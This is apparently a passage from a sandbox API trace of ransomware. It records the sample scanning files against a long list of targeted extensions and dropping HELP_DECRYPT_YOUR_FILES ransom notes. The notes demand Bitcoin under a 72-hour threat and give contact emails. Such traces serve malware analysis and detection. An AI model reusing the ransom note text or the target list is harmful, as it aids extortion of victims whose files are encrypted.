pt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ico") returned 0x0
	[0167.921] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c64, dwReserved0=0x0, dwReserved1=0x0, cFileName="tasks.xml", cAlternateFileName="")) returned 1
	[0167.921] lstrcmpW (lpString1="tasks.xml", lpString2="..") returned 1
	[0167.921] lstrcmpW (lpString1="tasks.xml", lpString2=".") returned 1
	[0167.921] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\"
	[0167.921] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", lpString2="tasks.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml"
	[0167.921] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml") returned 95
	[0167.923] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.923] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml", cchLength=0x5f | out: lpsz="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml") returned 0x5f
	[0167.923] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.923] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0167.923] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml" | out: lpString1="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml") returned="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml"
	[0167.923] lstrlenW (lpString="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml") returned 95
	[0167.923] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0167.924] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.924] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0167.924] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.924] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0167.924] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0167.924] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0167.925] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0167.926] CloseHandle (hObject=0xffffffff) returned 1
	[0167.927] CloseHandle (hObject=0xffffffff) returned 1
	[0167.927] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c64, dwReserved0=0x0, dwReserved1=0x0, cFileName="tasks.xml", cAlternateFileName="")) returned 0
	[0167.927] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0167.930] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0167.930] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}"
	[0167.930] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*"
	[0167.930] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0167.930] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0167.931] wsprintfW (in: param_1=0x189660, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\HELP_DECRYPT_YOUR_FILES.TXT") returned 113
	[0167.931] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0167.934] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0167.934] WriteFile (in: hFile=0x390, lpBuffer=0x188a18*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18993c, lpOverlapped=0x0 | out: lpBuffer=0x188a18*, lpNumberOfBytesWritten=0x18993c*=0xc46, lpOverlapped=0x0) returned 1
	[0167.936] CloseHandle (hObject=0x390) returned 1
	[0167.937] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1889e8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1889e8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0167.946] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0167.946] GetUserNameA (in: lpBuffer=0x1888cc, pcbBuffer=0x1889e4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1889e4) returned 1
	[0167.947] wsprintfW (in: param_1=0x189868, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0167.947] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0167.947] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0167.948] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0167.948] WriteFile (in: hFile=0x390, lpBuffer=0x189868*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x189944, lpOverlapped=0x0 | out: lpBuffer=0x189868*, lpNumberOfBytesWritten=0x189944*=0x30, lpOverlapped=0x0) returned 1
	[0167.948] CloseHandle (hObject=0x390) returned 1
	[0167.949] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0167.949] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0167.949] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0167.949] wsprintfW (in: param_1=0x189620, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\HELP_DECRYPT_YOUR_FILES.HTML") returned 114
	[0167.949] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0167.950] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0167.950] WriteFile (in: hFile=0x390, lpBuffer=0x188e14*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0x188e14*, lpNumberOfBytesWritten=0x189938*=0x808, lpOverlapped=0x0) returned 1
	[0167.952] CloseHandle (hObject=0x390) returned 1
	[0167.953] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0167.954] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x188dfc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x188dfc*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0167.954] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0167.954] GetUserNameA (in: lpBuffer=0x188ce0, pcbBuffer=0x188df8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x188df8) returned 1
	[0167.955] wsprintfA (in: param_1=0x189828, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
